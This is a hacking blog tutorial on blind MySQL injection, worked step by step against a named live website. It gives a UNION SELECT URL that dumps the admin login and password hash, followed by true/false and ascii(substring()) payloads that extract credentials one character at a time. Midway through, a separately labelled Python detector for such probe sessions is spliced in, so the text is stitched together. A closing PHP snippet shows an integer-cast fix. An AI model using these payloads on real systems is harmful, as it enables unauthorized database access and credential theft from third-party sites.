
[Tutorial] Blind MySQL Injection

20:05 sql injection, Website hacking


Many web developers use SQL, and it is a difficult language to use well. Everything from the simplest listing of data from the database to update and insert operations is done with it. However, when we combine SQL with a web programming language, it can lead to very dangerous situations. This kind of danger exists not because of the programming language itself but because developers leave the door open.

SQL injection means adding recognizable characters to some part of the query.

For example:
In http://www.site.com/konu.php?id=25 we put an apostrophe after the (25) part, giving /konu.php?id=25', and check whether the page returns true or false. For blind SQL the important thing for us is whether the page turns out true or false. If you ask how we detect blind SQL, the simplest method, which I would like to show here, is to query the page and check whether its state is true or false.

True -> http://www.site.com/konu.php?id=25 and 1 = 1
False -> http://www.site.com/konu.php?id=25 and 1 = 2
So if the page comes back normally with 1 = 1 but with 1 = 2 some data on the page goes missing (such as the data from the database not being shown), then we have caught a blind SQL injection. Now let's start our practice with examples, using a security weakness in a foreign website that runs PHP & MySQL.

~ THIS ARTICLE is written assuming that you KNOW NORMAL SQL Injection ~

First, let me say this: in this example the MySQL website does have blind SQL injection, but it also accepts normal SQL queries and reflects the displayed data. In blind SQL injection the data is never reflected to the screen! We build it ourselves, based on true/false. I first obtained the site admin's information by applying normal SQL queries, like this:

http://www.bozar.be/activity.php?id=11214+and+1=2+union+select+version(),database(),user(),4,5,6,7,8,9,concat(login,0x3a
,password),11,12,13,14,15,16,17+from+users--

As seen, our table name is users, and our column names are login and password. Let me also add a picture of the displayed output:


In the admin part here is the administrator (admin) information we want to obtain. The password came as an md5 hash.

Now let's try the same URL with and 1 = 1 and with and 1 = 2 and see. So now we will do our tests with blind injection code:

Here we go ...

Try http://www.bozar.be/activity.php?id=11214 and 1 = 1. The page comes up normally.

Try http://www.bozar.be/activity.php?id=11214 and 1 = 2. The page has been redirected to 404.php. So a change has occurred. If the page had dropped to 404.php when we did 1 = 1 as well, we would just say nothing came of it; but the page was normal in the 1 = 1 case and wrong in the 1 = 2 case. Is it now clear as day that this is blind SQL?

Now let's check the MySQL version if you wish.
http://www.bozar.be/activity.php?id=11214 and substring(version(),1,1)=4 returned the page as true (correct). If I had written 5 instead of 4, it would not accept it for version 5 and would go to 404.php (you can try). So the MySQL version is 4, by the way :)

Now let's see whether it accepts the select command.
http://www.bozar.be/activity.php?id=11214 and (select 1)=1 returned the page with no problem, so it is still true.

Now let's test with blind the users table that I just told you we found, using this command:
http://www.bozar.be/activity.php?id=11214 and (select 1 from table limit 0,1)=1 with the table name given as table now goes to 404.php, because there is no table with that name. Let's make the table users and the page comes up seamlessly, which also shows that our table name is users.

http://www.bozar.be/activity.php?id=11214 and (select 1 from users limit 0,1)=1 returned true again.

Now let's test the columns belonging to the users table:
http://www.bozar.be/activity.php?id=11214 and (select substring(concat(1,column),1,1) from users limit 0,1)=1
Entered this way it still throws us to 404.php, because there is no column named column. We will change this column value.

http://www.bozar.be/activity.php?id=11214 and (select substring(concat(1,login),1,1) from users limit 0,1)=1
When we write login, the page returns true with no problem, because there is a column named login. In the same way we find the other column, password.

Now let's continue with login and password... We start pulling the data letter by letter: 1st letter, 2nd letter, 3rd letter, and so on.

Let's begin pulling the data with letter 1:
http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(column1,0x3a,column2) from table limit 0,1),1,1))>97

We write our table and column information into this command here. What is this 97 part? It is the number corresponding to the letter among the ASCII characters.

You can browse these characters in detail at www.asciitable.co. In addition, you can learn the details of the code used for blind injection by typing "blind injection cheat sheet" into Google.

http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(login,0x3a,password) from users limit 0,1),1,1))>96 and the page comes up properly. The important thing is to find where the page breaks, that is, where it returns false. But before that I want to clarify something.

Now, you may ask, according to what do you write these numbers?

As can be seen on asciitable.com, any number between 0 and 127 can be written here. The number just before the one at which the page breaks will be the first letter of our data. (We can think of it like the normal SQL injection method; as I said before starting the blind SQL injection, I assume you know that subject.)

http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(login,0x3a,password) from users limit 0,1),1,1))>97: when we do this the page is lost, whereas with 96 it came up properly, so 97 is our first letter. Now we look at asciitable.com: 97 corresponds to "a", that is, as I showed you in the picture just before, the information is in the form admin. Blind gives us the same result.

2nd letter:
http://www.bozar.be/activity.php?id=11214 and ascii(substring((SELECT concat(login,0x3a,password) from users limit 0,1),2,1))>99
Now, for the 2nd letter, we change the position inside the brackets from 1,1 to 2,1.

We already know from the start that the 2nd letter is d. On asciitable the value for "d" is 100, and the page goes that way anyway: 99 properly, breaking at 100. So the 2nd letter is d. In this way we are going to take all the letters one by one. How do we know it is the last letter? If at the end the page no longer changes for any value between 0 and 127 and always returns true, the data is finished.
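The probe sequence described above (the and 1=1 / and 1=2 pair, then one ascii(substring()) comparison per letter, each answered either normally or with the error page) leaves a very recognizable trace in a web server's access log. As an added example, not part of the original post, here is a small Python detector that runs over constructed sample log lines (not real traffic from the site named above) and flags clients whose requests look like such a session. The log format, the 302 used for the "false" answer and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page's target site) mimicking the
# tutorial's probe sequence; a 302 to the error page stands in for the "false" answer.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /activity.php?id=11214+and+1=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /activity.php?id=11214+and+1=2 HTTP/1.1" 302 0
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /activity.php?id=11214+and+ascii(substring((select+concat(login,0x3a,password)+from+users+limit+0,1),1,1))%3E96 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /activity.php?id=11214+and+ascii(substring((select+concat(login,0x3a,password)+from+users+limit+0,1),1,1))%3E97 HTTP/1.1" 302 0
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /activity.php?id=11214+and+ascii(substring((select+concat(login,0x3a,password)+from+users+limit+0,1),2,1))%3E99 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /activity.php?id=11215 HTTP/1.1" 200 4980
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Matched against the URL-decoded, lower-cased, whitespace-collapsed request target,
# so "+", "%20", "%3E" and mixed case are normalised away before matching.
SIGNATURES = {
    "taut_true": re.compile(r"\band 1 ?= ?1\b"),
    "taut_false": re.compile(r"\band 1 ?= ?2\b"),
    "char_probe": re.compile(r"ascii ?\( ?substring ?\("),
}

def analyze(log_text, probe_threshold=2):
    # Returns {client_ip: [reasons]} for clients whose requests look like a blind session.
    hits = defaultdict(lambda: defaultdict(int))
    probe_statuses = defaultdict(set)  # HTTP statuses returned to each client's probes
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(3), m.group(4)
        norm = re.sub(r"\s+", " ", unquote_plus(target)).lower()
        matched = [name for name, pat in SIGNATURES.items() if pat.search(norm)]
        for name in matched:
            hits[ip][name] += 1
        if matched:
            probe_statuses[ip].add(status)
    verdicts = {}
    for ip, counts in hits.items():
        reasons = []
        if counts["taut_true"] and counts["taut_false"]:
            reasons.append("and 1=1 / and 1=2 tautology pair")
        if counts["char_probe"] >= probe_threshold:
            reasons.append(f"{counts['char_probe']} per-character ascii(substring()) probes")
        if len(probe_statuses[ip]) > 1:  # the true/false oracle: probes got differing answers
            reasons.append("probes answered with " + "/".join(sorted(probe_statuses[ip])))
        if reasons:
            verdicts[ip] = reasons
    return verdicts
```

The third reason is the one that distinguishes a real boolean oracle from mere scanner noise: the same client's injected requests are answered with two different statuses, exactly the normal-page versus 404.php difference the post relies on.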

Blind SQL is a very broad subject and as a result very troublesome. But it is clearly there at most large companies, including hosting providers; I have personally come across it at big places... The only difference of blind SQL from the other kinds is that the page reflects the result of the query only as a response, that is, true or false. For example, the door is left open like this, by letting what we add to the query affect the query:

It says select * from users where userid = 1. The page comes up true, showing the information of the person with userid 1. When we make it userid = 2 the page breaks, but that is a normal reaction; if the page breaks because of a syntax error in our query, this turns into blind SQL. I would like to give an example of a PHP and MySQL query for users:
<?php
// Cast the request parameter to an integer before it reaches the query.
$userid = (int) $_GET["userid"];
$query = mysql_query("SELECT * FROM users WHERE userid = '$userid'");
while ($row = mysql_fetch_array($query)) {
    // display the row's data ...
}
?>

If you write queries like this, confirm that the data is an integer; otherwise you leave the door open!
